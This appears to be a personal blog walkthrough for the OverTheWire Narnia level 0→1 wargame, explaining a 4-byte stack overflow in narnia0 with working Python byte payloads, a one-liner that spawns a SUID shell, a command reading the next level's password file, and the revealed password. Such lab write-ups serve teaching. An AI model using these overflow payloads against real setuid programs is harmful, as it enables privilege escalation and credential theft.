Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Narnia Level 0 → 1 tutorial!!

Login

Log in as narnia0.

ssh narnia0@narnia.labs.overthewire.org -p 2226
# password: narnia0

Why? Each Narnia level is a separate UNIX user. To solve Level 0 → 1 you must be the narnia0 user.


Task

You’re given an executable /narnia/narnia0 and its source code narnia0.c. Goal: change the variable val from 0x41414141 to 0xdeadbeef to trigger a SUID shell as narnia1.


A little bit of Theory

  • The program declares:

    • char buf[20]; → a 20-byte stack buffer
    • long val = 0x41414141;
  • It then calls scanf("%24s", buf); this reads up to 24 bytes into a 20-byte buffer → classic stack overflow of 4 bytes.
  • On little-endian x86, the byte order for 0xdeadbeef is \xef\xbe\xad\xde (least significant byte first).
  • If the 4 bytes after buf are val, overflowing buf by exactly 4 bytes lets us overwrite val.
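
The overflow and its fix, as an added example that is not the narnia0 source or code from the original page: a constructed flat-array model of the frame (assuming val sits directly after buf, as described above) compares the %24s width with a hardened %19s. The names frame, IN24, IN20, val_after_width24 and val_after_width19 are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model, not the narnia0 source: buf[20] at offset 0 and the
 * 4-byte val directly after it (the layout this page assumes). The slack
 * bytes keep the NUL that scanf appends inside mem, so nothing here is UB. */
enum { BUF_LEN = 20, VAL_OFF = BUF_LEN, FRAME_LEN = 28 };
struct frame { unsigned char mem[FRAME_LEN]; };

static const char IN24[] = "AAAAAAAAAA" "AAAAAAAAAA" "BCDE"; /* 20 fill + 4 marker bytes */
static const char IN20[] = "AAAAAAAAAA" "AAAAAAAAAA";        /* exactly sizeof(buf) */

static void frame_init(struct frame *f) {
    memset(f->mem, 0, sizeof f->mem);
    memset(f->mem + VAL_OFF, 0x41, 4);             /* val = 0x41414141 */
}

/* Read val the way little-endian x86 does: lowest address is the low byte. */
static uint32_t frame_val(const struct frame *f) {
    const unsigned char *p = f->mem + VAL_OFF;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Width from the page: %24s stores up to 24 chars plus a terminating NUL. */
static uint32_t val_after_width24(const char *input) {
    struct frame f;
    frame_init(&f);
    sscanf(input, "%24s", (char *)f.mem);
    return frame_val(&f);
}

/* Hardened width: sizeof(buf) - 1, so the chars and the NUL both fit in buf. */
static uint32_t val_after_width19(const char *input) {
    struct frame f;
    frame_init(&f);
    sscanf(input, "%19s", (char *)f.mem);
    return frame_val(&f);
}

int main(void) {
    printf("%%24s, 24 chars: 0x%08x\n", (unsigned)val_after_width24(IN24));
    printf("%%24s, 20 chars: 0x%08x\n", (unsigned)val_after_width24(IN20));
    printf("%%19s, 24 chars: 0x%08x\n", (unsigned)val_after_width19(IN24));
    return 0;
}
```

In this model, even input that exactly fills buf changes val under %24s, because scanf writes its terminating NUL one byte past the buffer; with %19s val is untouched in every case.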


Solution

  1. Run once to see behavior

    cd /narnia
    ./narnia0
    # Correct val's value from 0x41414141 -> 0xdeadbeef!
    # Here is your chance: TEST
    # buf: TEST
    # val: 0x41414141
    # WAY OFF!!!!
    

    Why? Confirms default val and the exact messages the binary prints.

  2. Prove we control val (pattern write)

    Send 20 A (fill buf) + 4 B (overwrite val) + newline:

    python3 - <<'PY' | ./narnia0
    import sys
    sys.stdout.buffer.write(b"A"*20 + b"BBBB" + b"\n")
    PY
    # val: 0x42424242
    # WAY OFF!!!!

    Why? BBBB is 0x42 ×4 → 0x42424242. Seeing that value proves the overwrite.

  3. Write the correct value (0xdeadbeef) and keep the shell alive

    The binary spawns a shell when val == 0xdeadbeef. We’ll:

    • Overflow buf with 20 A.
    • Overwrite val with \xef\xbe\xad\xde.
    • Follow the payload with cat so stdin stays open and the spawned shell stays interactive.

    ( python3 - <<'PY'
    import sys
    sys.stdout.buffer.write(b"A"*20 + b"\xef\xbe\xad\xde" + b"\n")
    PY
    cat ) | ./narnia0

    Expected lines include:

    # Correct val's value from 0x41414141 -> 0xdeadbeef!
    # val: 0xdeadbeef

  4. Verify and dump the next password

    Inside the spawned shell:

    whoami
    # narnia1
    id
    cat /etc/narnia_pass/narnia1
    

Password

From my run, the password for narnia1 is:

efeidiedae

(If your output differs, use the one your terminal printed.)


Troubleshooting

  • Still shows WAY OFF!!!!: You probably wrote \xde\xad\xbe\xef (big-endian). Use \xef\xbe\xad\xde (little-endian).
  • Shell exits immediately: Don’t just pipe once; use the subshell + cat trick shown above to keep stdin open.
  • Weird characters / locale issues: Always send raw bytes via Python (sys.stdout.buffer.write) instead of echo -e.
  • Nothing happens after printing prompts: Hit Enter. scanf("%24s", ...) expects a newline to finalize the input token.

Copy-paste quick run (one-liner)

( python3 - <<'PY'
import sys
sys.stdout.buffer.write(b"A"*20 + b"\xef\xbe\xad\xde" + b"\n")
PY
cat ) | /narnia/narnia0
# then inside the spawned shell:
# whoami; cat /etc/narnia_pass/narnia1

Congrats 🎉 Classic 4-byte stack overflow, correct endianness, SUID shell, next password in your pocket. See you in Level 1 → 2!


Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨
